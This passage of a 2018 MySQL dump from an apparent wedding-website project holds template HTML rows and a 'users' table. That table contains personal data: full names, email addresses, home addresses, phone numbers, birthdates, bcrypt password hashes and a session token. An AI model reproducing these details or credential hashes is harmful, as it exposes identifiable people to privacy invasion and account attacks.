been in the visual arts program at the time), and she remembers Andy being an ‘arrogant computer nerd’, boasting his knowledge of Macs over the other students.','text',NULL,9,NULL,NULL,NULL),(273,'~*35*~','<div class=\"col-sm-4 gla_anim_box grid-item engagement\">\n    <div class=\"gla_shop_item\">\n	<a href=\"~*36*~\" class=\"lightbox\">\n	    <img src=\"~*36*~\" alt=\"\">\n	</a>\n    </div>\n</div>','html',273,9,NULL,NULL,NULL),(274,'~*36*~','images/wedding/lauren_affonso/14214345610_af0e495ff2_k.jpg','image',NULL,9,NULL,NULL,NULL),(275,'~*37*~','<div class=\"col-sm-4 gla_anim_box grid-item bridesmaids\">\n    <div class=\"gla_shop_item\">\n	<a href=\"~*38*~\" class=\"lightbox\">\n	    <img src=\"~*39*~\" alt=\"\">\n	</a>\n	<a href=\"#\" class=\"gla_shop_item_title\">\n	    ~*40*~\n	</a>\n    </div>\n</div>','html',275,9,NULL,NULL,NULL),(276,'~*38*~','images/wedding/lauren_affonso/14421186043_a817e20aa5_k-ryan-moreno.html','image',NULL,9,NULL,NULL,NULL),(277,'~*39*~','images/wedding/lauren_affonso/600x600/14421186043_a817e20aa5_k.jpg','image',NULL,9,NULL,NULL,NULL),(278,'~*40*~','Andrew & Joanna','text',NULL,9,NULL,NULL,NULL),(279,'~*41*~','images/wedding/lauren_affonso/14377952686_252620ebb7_k.jpg','image',NULL,9,NULL,NULL,NULL),(280,'~*42*~','images/animations/thnyou_wh.gif','image',NULL,9,NULL,NULL,NULL);
/*!40000 ALTER TABLE `template_design_detail` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `users`
--

DROP TABLE IF EXISTS `users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `users` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `nama` varchar(200) NOT NULL,
  `email` varchar(200) NOT NULL,
  `password` text NOT NULL,
  `alamat` varchar(500) NOT NULL,
  `telepon` varchar(50) NOT NULL,
  `jenis_kelamin` int(11) DEFAULT NULL,
  `tanggal_lahir` date DEFAULT NULL,
  `jabatan` int(11) NOT NULL,
  `status` int(11) NOT NULL,
  `remember_token` varchar(100) DEFAULT NULL,
  `created_at` datetime DEFAULT NULL,
  `verified_at` datetime DEFAULT NULL,
  `updated_at` datetime DEFAULT NULL,
  `deleted_at` datetime DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=12 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `users`
--

LOCK TABLES `users` WRITE;
/*!40000 ALTER TABLE `users` DISABLE KEYS */;
INSERT INTO `users` VALUES (7,'yulius','dian.yulius@gmail.com','$2y$10$DYwlKGRrZoRpA1/nLHfcw.A/Sx7sPXP/ayzH2Y7mMsoqid5Y1sAYq','asda','123-123123213',1,'2018-08-09',2,2,NULL,'2018-08-29 08:03:57','2018-08-29 08:03:57','2018-08-29 08:03:57',NULL),(8,'Daivalentineno J S','daivalentinenojs@gmail.com','$2y$10$6IAyTYEYQH7K.PeNnTpGuex2VqymGCqUabGPQ5Um9wyoi3DzN5pMy','North Citraland D6 Number 6, Surabaya, East Java, Indonesia','089-695969367',1,'1995-01-24',1,2,'IsHKsktrUXL70wqalLrxB1vFdqFLK3089y6z8viK6vwTu2T3FBZnr6iCRf43','2018-08-30 03:38:17','2018-08-30 03:38:52','2018-08-30 03:38:52',NULL),(9,'Marselinus Steven Brian Susantio','caesarbigbo@gmail.com','$2y$10$MVqrrmBKOiT25VXWuSz9iuWsTaGS3mLZRQxn3RwH1njNmbfRJ9Zs.','Rungkut Mapan Barat IV / 14, Surabaya','081-357604022',1,'1996-04-28',1,1,NULL,'2018-08-30 09:52:49',NULL,'2018-08-30 09:52:49',NULL),(11,'Marselinus Steven Brian Susantio','caesardaipo@gmail.com','$2y$10$9Ms6Zr6nnfZ0hJMfA0F4XOsAFqL.LlW21X6nnCqYlJ4qluHUPzxSu','Rungkut Mapan Barat IV / 14, Surabaya','081-357604022',1,'1996-04-28',1,1,NULL,'2018-08-30 09:57:05',NULL,'2018-08-30 09:57:58',NULL);
/*!40000 ALTER TABLE `users` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2018-09-10  0:49:25
